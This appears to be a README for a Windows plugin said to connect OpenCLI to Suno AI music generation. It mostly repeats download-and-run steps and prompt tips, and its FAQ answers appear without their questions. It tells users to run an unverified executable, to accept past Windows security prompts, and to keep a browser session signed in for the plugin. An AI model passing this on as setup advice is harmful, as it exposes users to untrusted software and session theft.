opencli-plugin-suno is an OpenCLI plugin for Suno AI music generation on Windows. It helps you send music prompts from OpenCLI and turn them into songs with less manual work.
Use the GitHub link above to visit the download page, then download and run the app or plugin package from there.
- Open the download page: https://github.com/ma367175/opencli-plugin-suno
- Look for the latest release or the main download file on the page.
- Download the file to your Windows PC.
- If the file is a ZIP package, right-click it and choose Extract All.
- Open the extracted folder and run the setup file or app file.
- If Windows asks for permission, choose Run or Yes.
If you use a browser, you can also keep this page open and return to it while you install.
Before you start, make sure your PC has:
- Windows 10 or Windows 11
- A stable internet connection
- Enough free disk space for the app and cached music files
- An OpenCLI setup ready to use
- A Suno account or access method that the plugin can connect to
For the best result, keep your browser signed in if the plugin uses your web session.
This plugin adds Suno music generation to your OpenCLI workflow. It lets you:
- Send music prompts from OpenCLI
- Create song ideas from text
- Start music jobs from the command line flow
- Keep a simple link between your prompt and the music output
- Use Suno features without handling each step by hand
It is built for users who want a cleaner way to work with AI music inside an OpenCLI setup.
- Download the file from the GitHub page.
- Save it in a folder you can find again, like Downloads.
- If the file is compressed, extract it first.
- Find the main app file or install file.
- Double-click it to start.
- If a security prompt appears, choose the option that lets the app open.
- Follow the on-screen steps until the plugin is ready.
If the app opens in a console window, keep that window open while you use it.
Once the plugin is running, you can use it with OpenCLI to guide Suno music creation.
Typical use looks like this:
- Open OpenCLI.
- Select the Suno plugin or related command.
- Type your music prompt.
- Choose the style, mood, or theme you want.
- Start the generation task.
- Wait for the song output to complete.
Example prompt ideas:
- Upbeat pop song for a workout video
- Soft piano track for a calm scene
- Retro synth song with a night drive feel
- Short intro music for a podcast
- Fast electronic track with a bold beat
Keep prompts clear. Short prompts often work well.
To get better results, include:
- Genre
- Mood
- Tempo
- Instruments
- Vocal style
- Song purpose
Example:
- Indie rock
- Warm and emotional
- Mid tempo
- Clean guitar and light drums
- Male vocal
- Background music for a travel video
You can also test small changes one at a time. That makes it easier to see what Suno changes in the result.
If the plugin does not start, check these items:
- The file finished downloading
- You extracted the ZIP file before opening it
- You opened the correct app file
- OpenCLI is installed and ready
- Your internet connection is working
- Your Suno login or access path is active
If the app opens and closes fast, run it again from the folder and keep the window open.
A simple folder layout can help you stay organized:
- Downloads: for the original file
- opencli-plugin-suno: for the extracted app files
- Music Output: for finished songs
- Prompts: for saved prompt text
This makes it easier to find your files later.
If you need to get the file again, use this link:
https://github.com/ma367175/opencli-plugin-suno
Yes. The install steps are simple if you follow the download page and open the main file on Windows.
No. Basic use should work through the app or plugin flow.
Yes. It is made to work as an OpenCLI plugin for Suno AI music generation.
You can create music ideas, song drafts, backing tracks, and prompt-based audio output based on Suno features.
Use the main GitHub link and look for the latest file or release area on the page.
For your first use:
- Download the file.
- Extract it if needed.
- Run the main file.
- Test one short prompt.
- Check that the output matches your goal.
- Save a prompt that works well for later use
- Keep the original download until you know the app works
- Do not move files while the app is open
- Save your prompts in a text file
- Store completed songs in one folder
- Rename files in a simple way, like
workout-pop-01
A normal session may follow this order:
- Open OpenCLI
- Start the Suno plugin
- Enter a music prompt
- Wait for generation
- Review the result
- Save the output
- Try a new prompt if needed
If you want to test the plugin, use a short prompt like:
- Calm acoustic song for a short video
This keeps the first run simple and easy to review
Visit the GitHub page to download and run opencli-plugin-suno